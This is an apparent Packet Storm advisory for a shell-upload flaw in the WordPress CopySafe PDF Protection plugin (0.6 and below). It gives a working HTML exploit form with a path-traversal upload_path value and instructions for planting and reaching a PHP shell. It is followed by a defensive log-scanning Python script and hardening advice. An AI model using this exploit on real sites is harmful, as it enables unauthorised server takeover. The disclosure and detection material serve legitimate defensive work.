WordPress CopySafe PDF Protection 0.6 Shell Upload

2014-07-14T00:00:00
ID PACKETSTORM:127457
Type packetstorm
Reporter Jagriti Sahu
Modified 2014-07-14T00:00:00

Description

                                        
                                            `##################################################################################################  
#Exploit Title : Wordpress Plugin CopySafe PDF Protection Shell Upload vulnerability
#Author : Jagriti Sahu  
#Download Link : http://wordpress.org/support/plugin/wp-copysafe-pdf  
#version affected : 0.6 and below  
#Date : 14/07/2014  
#Discovered at : IndiShell Lab  
#Love to : Surbhi, Mradula and Harry  
##################################################################################################  
  
////////////////////////  
/// Overview:  
////////////////////////  
The WordPress plugin CopySafe PDF Protection (up to version 0.6) suffers
from an unrestricted file upload vulnerability which allows an attacker to
upload a malicious PHP shell to the server.
To avoid exploitation, update the plugin to version 0.7.
  
///////////////////////////////  
// Vulnerability Description:  
///////////////////////////////  
The vulnerability is in the lib/uploadify/uploadify.php file, which performs
no check on the uploaded file during upload.
An attacker only needs to send a file upload request to this file with a PHP
shell and a file upload path.
  
  
///////////////////////  
/// exploit code ////  
///////////////////////  
  
  
<form
action="http://website.com/wp-content/plugins/wp-copysafe-pdf/lib/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="wpcsp_file"><br>
<input type="text" name="upload_path" value="../../../../uploads/">
<input type="submit" name="submit" value="Submit">
</form>
  
Save this code on your machine as exploit.html.
Open exploit.html in a web browser, browse to your PHP shell and click the
Submit button.

The shell will be uploaded to the uploads directory:
http://website.com/wp-content/uploads/shell.php
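For defenders, the two-stage pattern described above (a multipart POST to the plugin's uploadify.php handler, followed by a request for a .php file under wp-content/uploads) is straightforward to spot in web server access logs. The script below is an added example written for this page, not code from the advisory or the plugin; it assumes Apache/nginx "combined" log format, and the log lines it runs over are constructed for illustration (the handler path and the uploads path are the ones named in the advisory).

```python
"""Flag the CopySafe PDF Protection upload-abuse pattern in access logs.

Added example (not part of the original advisory). Assumes the "combined"
access log format. SAMPLE_LOG is constructed for illustration only.
"""
import re
from collections import defaultdict

# Upload handler path from the advisory and the uploads directory it writes to.
UPLOADIFY_PATH = "/wp-content/plugins/wp-copysafe-pdf/lib/uploadify/uploadify.php"
UPLOADS_PHP = re.compile(r"^/wp-content/uploads/.*\.php\d?(\?.*)?$", re.IGNORECASE)

# ip ident user [time] "METHOD path HTTP/x" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def find_upload_abuse(lines):
    """Return a list of (ip, kind, path) alerts.

    kind is one of:
      handler_post       - POST to the vulnerable uploadify.php handler
      uploaded_php_exec  - a .php file under uploads served (200) to an IP
                           that previously hit the handler
      php_in_uploads     - a .php file under uploads served (200) with no
                           prior handler POST seen from that IP
    """
    alerts = []
    handler_posts = defaultdict(list)  # ip -> timestamps of handler POSTs
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # skip lines that are not in combined format
        ip, method, path, status = rec["ip"], rec["method"], rec["path"], rec["status"]
        if method == "POST" and path.split("?", 1)[0] == UPLOADIFY_PATH:
            alerts.append((ip, "handler_post", path))
            handler_posts[ip].append(rec["time"])
        elif UPLOADS_PHP.match(path) and status == 200:
            # PHP should never be served from the uploads tree at all; a hit
            # after a handler POST from the same IP is the exploit chain.
            kind = "uploaded_php_exec" if handler_posts.get(ip) else "php_in_uploads"
            alerts.append((ip, kind, path))
    return alerts


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [14/Jul/2014:10:01:02 +0000] "GET /wp-login.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [14/Jul/2014:10:01:09 +0000] "POST /wp-content/plugins/wp-copysafe-pdf/lib/uploadify/uploadify.php HTTP/1.1" 200 45 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [14/Jul/2014:10:01:15 +0000] "GET /wp-content/uploads/shell.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [14/Jul/2014:10:02:00 +0000] "GET /wp-content/uploads/2014/07/report.pdf HTTP/1.1" 200 80000 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [14/Jul/2014:10:03:00 +0000] "GET /wp-content/uploads/old.php HTTP/1.1" 404 200 "-" "curl/7.30"',
]

if __name__ == "__main__":
    for ip, kind, path in find_upload_abuse(SAMPLE_LOG):
        print(f"{kind:18} {ip:15} {path}")
```

Run it against a real access log with `find_upload_abuse(open("access.log"))`. Any `handler_post` hit on a site still running 0.6 or below warrants checking wp-content/uploads for PHP files, and `php_in_uploads` alone is worth investigating on any WordPress install, since legitimate uploads should never contain executable PHP. Alongside updating to 0.7 as the advisory says, denying PHP execution in the uploads directory at the web server removes the second stage of this chain regardless of how the file got there.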
  